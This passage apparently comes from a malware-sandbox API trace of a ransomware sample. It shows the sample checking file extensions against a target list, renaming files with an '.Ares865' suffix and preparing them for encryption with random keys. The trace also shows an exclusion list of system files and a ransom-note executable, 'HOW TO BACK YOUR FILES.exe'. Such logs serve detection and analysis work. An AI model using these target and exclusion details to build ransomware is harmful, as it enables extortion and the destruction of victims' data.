[0065.428] lstrcmpiW (lpString1="b-ms", lpString2="vhdx") returned -1 [0065.428] lstrlenW (lpString="avhd") returned 4 [0065.428] lstrcmpiW (lpString1="b-ms", lpString2="avhd") returned 1 [0065.428] lstrlenW (lpString="db") returned 2 [0065.428] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0065.428] lstrlenW (lpString="db2") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0065.428] lstrlenW (lpString="db3") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0065.428] lstrlenW (lpString="dbf") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0065.428] lstrlenW (lpString="mdf") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0065.428] lstrlenW (lpString="mdb") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0065.428] lstrlenW (lpString="sql") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0065.428] lstrlenW (lpString="sqlite") returned 6 [0065.428] lstrcmpiW (lpString1="sdb-ms", lpString2="sqlite") returned -1 [0065.428] lstrlenW (lpString="sqlite3") returned 7 [0065.428] lstrcmpiW (lpString1="dsdb-ms", lpString2="sqlite3") returned -1 [0065.428] lstrlenW (lpString="sqlitedb") returned 8 [0065.428] lstrcmpiW (lpString1="edsdb-ms", lpString2="sqlitedb") returned -1 [0065.428] lstrlenW (lpString="xml") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0065.429] lstrlenW (lpString="$er") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0065.429] lstrlenW (lpString="4dd") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0065.429] lstrlenW (lpString="4dl") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0065.429] lstrlenW (lpString="^^^") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0065.429] lstrlenW (lpString="abs") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0065.429] lstrlenW (lpString="abx") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0065.429] lstrlenW (lpString="accdb") returned 5 [0065.429] lstrcmpiW (lpString1="db-ms", lpString2="accdb") returned 1 [0065.429] lstrlenW (lpString="accdc") returned 5 [0065.429] lstrcmpiW (lpString1="db-ms", lpString2="accdc") returned 1 [0065.429] lstrlenW (lpString="accde") returned 5 [0065.429] lstrcmpiW (lpString1="db-ms", lpString2="accde") returned 1 [0065.429] lstrlenW (lpString="accdr") returned 5 [0065.429] lstrcmpiW (lpString1="db-ms", lpString2="accdr") returned 1 [0065.429] lstrlenW (lpString="accdt") returned 5 [0065.429] lstrcmpiW (lpString1="db-ms", lpString2="accdt") returned 1 [0065.429] lstrlenW (lpString="accdw") returned 5 [0065.429] lstrcmpiW (lpString1="db-ms", lpString2="accdw") returned 1 [0065.429] lstrlenW (lpString="accft") returned 5 [0065.429] lstrcmpiW (lpString1="db-ms", lpString2="accft") returned 1 [0065.429] lstrlenW (lpString="adb") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.429] lstrlenW (lpString="adb") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.429] lstrlenW (lpString="ade") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0065.429] lstrlenW (lpString="adf") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0065.429] lstrlenW (lpString="adn") returned 3 [0065.429] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0065.429] lstrlenW (lpString="adp") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0065.430] lstrlenW (lpString="alf") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0065.430] lstrlenW (lpString="ask") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0065.430] lstrlenW (lpString="btr") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0065.430] lstrlenW (lpString="cat") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0065.430] lstrlenW (lpString="cdb") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0065.430] lstrlenW (lpString="ckp") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0065.430] lstrlenW (lpString="cma") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0065.430] lstrlenW (lpString="cpd") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0065.430] lstrlenW (lpString="dacpac") returned 6 [0065.430] lstrcmpiW (lpString1="sdb-ms", lpString2="dacpac") returned 1 [0065.430] lstrlenW (lpString="dad") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0065.430] lstrlenW (lpString="dadiagrams") returned 10 [0065.430] lstrcmpiW (lpString1="feedsdb-ms", lpString2="dadiagrams") returned 1 [0065.430] lstrlenW (lpString="daschema") returned 8 [0065.430] lstrcmpiW (lpString1="edsdb-ms", lpString2="daschema") returned 1 [0065.430] lstrlenW (lpString="db-journal") returned 10 [0065.430] lstrcmpiW (lpString1="feedsdb-ms", lpString2="db-journal") returned 1 [0065.430] lstrlenW (lpString="db-shm") returned 6 [0065.430] lstrcmpiW (lpString1="sdb-ms", lpString2="db-shm") returned 1 [0065.430] lstrlenW (lpString="db-wal") returned 6 [0065.430] lstrcmpiW (lpString1="sdb-ms", lpString2="db-wal") returned 1 [0065.430] lstrlenW (lpString="dbc") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0065.430] lstrlenW (lpString="dbs") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0065.430] lstrlenW (lpString="dbt") returned 3 [0065.430] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0065.431] lstrlenW (lpString="dbv") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0065.431] lstrlenW (lpString="dbx") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0065.431] lstrlenW (lpString="dcb") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0065.431] lstrlenW (lpString="dct") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0065.431] lstrlenW (lpString="dcx") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0065.431] lstrlenW (lpString="ddl") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0065.431] lstrlenW (lpString="dlis") returned 4 [0065.431] lstrcmpiW (lpString1="b-ms", lpString2="dlis") returned -1 [0065.431] lstrlenW (lpString="dp1") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0065.431] lstrlenW (lpString="dqy") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0065.431] lstrlenW (lpString="dsk") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0065.431] lstrlenW (lpString="dsn") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0065.431] lstrlenW (lpString="dtsx") returned 4 [0065.431] lstrcmpiW (lpString1="b-ms", lpString2="dtsx") returned -1 [0065.431] lstrlenW (lpString="dxl") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0065.431] lstrlenW (lpString="eco") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0065.431] lstrlenW (lpString="ecx") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0065.431] lstrlenW (lpString="edb") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0065.431] lstrlenW (lpString="epim") returned 4 [0065.431] lstrcmpiW (lpString1="b-ms", lpString2="epim") returned -1 [0065.431] lstrlenW (lpString="fcd") returned 3 [0065.431] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0065.431] lstrlenW (lpString="fdb") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0065.432] lstrlenW (lpString="fic") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0065.432] lstrlenW (lpString="flexolibrary") returned 12 [0065.432] lstrcmpiW (lpString1="e.feedsdb-ms", lpString2="flexolibrary") returned -1 [0065.432] lstrlenW (lpString="fm5") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0065.432] lstrlenW (lpString="fmp") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0065.432] lstrlenW (lpString="fmp12") returned 5 [0065.432] lstrcmpiW (lpString1="db-ms", lpString2="fmp12") returned -1 [0065.432] lstrlenW (lpString="fmpsl") returned 5 [0065.432] lstrcmpiW (lpString1="db-ms", lpString2="fmpsl") returned -1 [0065.432] lstrlenW (lpString="fol") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0065.432] lstrlenW (lpString="fp3") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0065.432] lstrlenW (lpString="fp4") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0065.432] lstrlenW (lpString="fp5") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0065.432] lstrlenW (lpString="fp7") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0065.432] lstrlenW (lpString="fpt") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0065.432] lstrlenW (lpString="frm") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0065.432] lstrlenW (lpString="gdb") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.432] lstrlenW (lpString="gdb") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.432] lstrlenW (lpString="grdb") returned 4 [0065.432] lstrcmpiW (lpString1="b-ms", lpString2="grdb") returned -1 [0065.432] lstrlenW (lpString="gwi") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0065.432] lstrlenW (lpString="hdb") returned 3 [0065.432] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0065.432] lstrlenW (lpString="his") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0065.433] lstrlenW (lpString="ib") returned 2 [0065.433] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0065.433] lstrlenW (lpString="idb") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0065.433] lstrlenW (lpString="ihx") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0065.433] lstrlenW (lpString="itdb") returned 4 [0065.433] lstrcmpiW (lpString1="b-ms", lpString2="itdb") returned -1 [0065.433] lstrlenW (lpString="itw") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0065.433] lstrlenW (lpString="jet") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0065.433] lstrlenW (lpString="jtx") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0065.433] lstrlenW (lpString="kdb") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0065.433] lstrlenW (lpString="kexi") returned 4 [0065.433] lstrcmpiW (lpString1="b-ms", lpString2="kexi") returned -1 [0065.433] lstrlenW (lpString="kexic") returned 5 [0065.433] lstrcmpiW (lpString1="db-ms", lpString2="kexic") returned -1 [0065.433] lstrlenW (lpString="kexis") returned 5 [0065.433] lstrcmpiW (lpString1="db-ms", lpString2="kexis") returned -1 [0065.433] lstrlenW (lpString="lgc") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0065.433] lstrlenW (lpString="lwx") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0065.433] lstrlenW (lpString="maf") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0065.433] lstrlenW (lpString="maq") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0065.433] lstrlenW (lpString="mar") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0065.433] lstrlenW (lpString="marshal") returned 7 [0065.433] lstrcmpiW (lpString1="dsdb-ms", lpString2="marshal") returned -1 [0065.433] lstrlenW (lpString="mas") returned 3 [0065.433] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0065.433] lstrlenW (lpString="mav") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0065.434] lstrlenW (lpString="maw") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0065.434] lstrlenW (lpString="mdbhtml") returned 7 [0065.434] lstrcmpiW (lpString1="dsdb-ms", lpString2="mdbhtml") returned -1 [0065.434] lstrlenW (lpString="mdn") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0065.434] lstrlenW (lpString="mdt") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0065.434] lstrlenW (lpString="mfd") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0065.434] lstrlenW (lpString="mpd") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0065.434] lstrlenW (lpString="mrg") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0065.434] lstrlenW (lpString="mud") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0065.434] lstrlenW (lpString="mwb") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0065.434] lstrlenW (lpString="myd") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0065.434] lstrlenW (lpString="ndf") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0065.434] lstrlenW (lpString="nnt") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0065.434] lstrlenW (lpString="nrmlib") returned 6 [0065.434] lstrcmpiW (lpString1="sdb-ms", lpString2="nrmlib") returned 1 [0065.434] lstrlenW (lpString="ns2") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0065.434] lstrlenW (lpString="ns3") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0065.434] lstrlenW (lpString="ns4") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0065.434] lstrlenW (lpString="nsf") returned 3 [0065.434] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0065.434] lstrlenW (lpString="nv") returned 2 [0065.435] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0065.435] lstrlenW (lpString="nv2") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0065.435] lstrlenW (lpString="nwdb") returned 4 [0065.435] lstrcmpiW (lpString1="b-ms", lpString2="nwdb") returned -1 [0065.435] lstrlenW (lpString="nyf") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0065.435] lstrlenW (lpString="odb") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.435] lstrlenW (lpString="odb") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.435] lstrlenW (lpString="oqy") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0065.435] lstrlenW (lpString="ora") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0065.435] lstrlenW (lpString="orx") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0065.435] lstrlenW (lpString="owc") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0065.435] lstrlenW (lpString="p96") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0065.435] lstrlenW (lpString="p97") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0065.435] lstrlenW (lpString="pan") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0065.435] lstrlenW (lpString="pdb") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0065.435] lstrlenW (lpString="pdm") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0065.435] lstrlenW (lpString="pnz") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0065.435] lstrlenW (lpString="qry") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0065.435] lstrlenW (lpString="qvd") returned 3 [0065.435] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0065.435] lstrlenW (lpString="rbf") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0065.436] lstrlenW (lpString="rctd") returned 4 [0065.436] lstrcmpiW (lpString1="b-ms", lpString2="rctd") returned -1 [0065.436] lstrlenW (lpString="rod") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0065.436] lstrlenW (lpString="rodx") returned 4 [0065.436] lstrcmpiW (lpString1="b-ms", lpString2="rodx") returned -1 [0065.436] lstrlenW (lpString="rpd") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0065.436] lstrlenW (lpString="rsd") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0065.436] lstrlenW (lpString="sas7bdat") returned 8 [0065.436] lstrcmpiW (lpString1="edsdb-ms", lpString2="sas7bdat") returned -1 [0065.436] lstrlenW (lpString="sbf") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0065.436] lstrlenW (lpString="scx") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0065.436] lstrlenW (lpString="sdb") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0065.436] lstrlenW (lpString="sdc") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0065.436] lstrlenW (lpString="sdf") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0065.436] lstrlenW (lpString="sis") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0065.436] lstrlenW (lpString="spq") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0065.436] lstrlenW (lpString="te") returned 2 [0065.436] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0065.436] lstrlenW (lpString="teacher") returned 7 [0065.436] lstrcmpiW (lpString1="dsdb-ms", lpString2="teacher") returned -1 [0065.436] lstrlenW (lpString="tmd") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0065.436] lstrlenW (lpString="tps") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0065.436] lstrlenW (lpString="trc") returned 3 [0065.436] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.437] lstrlenW (lpString="trc") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.437] lstrlenW (lpString="trm") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0065.437] lstrlenW (lpString="udb") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0065.437] lstrlenW (lpString="udl") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0065.437] lstrlenW (lpString="usr") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0065.437] lstrlenW (lpString="v12") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0065.437] lstrlenW (lpString="vis") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0065.437] lstrlenW (lpString="vpd") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0065.437] lstrlenW (lpString="vvv") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0065.437] lstrlenW (lpString="wdb") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0065.437] lstrlenW (lpString="wmdb") returned 4 [0065.437] lstrcmpiW (lpString1="b-ms", lpString2="wmdb") returned -1 [0065.437] lstrlenW (lpString="wrk") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0065.437] lstrlenW (lpString="xdb") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0065.437] lstrlenW (lpString="xld") returned 3 [0065.437] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0065.437] lstrlenW (lpString="xmlff") returned 5 [0065.437] lstrcmpiW (lpString1="db-ms", lpString2="xmlff") returned -1 [0065.437] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.Ares865") returned 82 [0065.437] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\feedsstore.feedsdb-ms.ares865"), dwFlags=0x1) returned 1 [0065.438] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\feedsstore.feedsdb-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.438] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6656) returned 1 [0065.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0065.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.439] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.440] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.440] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.440] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d00, lpName=0x0) returned 0x118 [0065.451] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d00) returned 0x190000 [0065.452] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.452] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.452] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.453] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.453] CloseHandle (hObject=0x118) returned 1 [0065.453] CloseHandle (hObject=0x164) returned 1 [0065.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.454] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac52b20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.454] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.454] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Feeds~", cAlternateFileName="MICROS~1")) returned 1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="aoldtz.exe") returned 1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2=".") returned 1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="..") returned 1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="windows") returned -1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="bootmgr") returned 1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="temp") returned -1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="pagefile.sys") returned -1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="boot") returned 1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="ids.txt") returned 1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="ntuser.dat") returned -1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="perflogs") returned -1 [0065.454] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="MSBuild") returned -1 [0065.454] lstrlenW (lpString="Microsoft Feeds~") 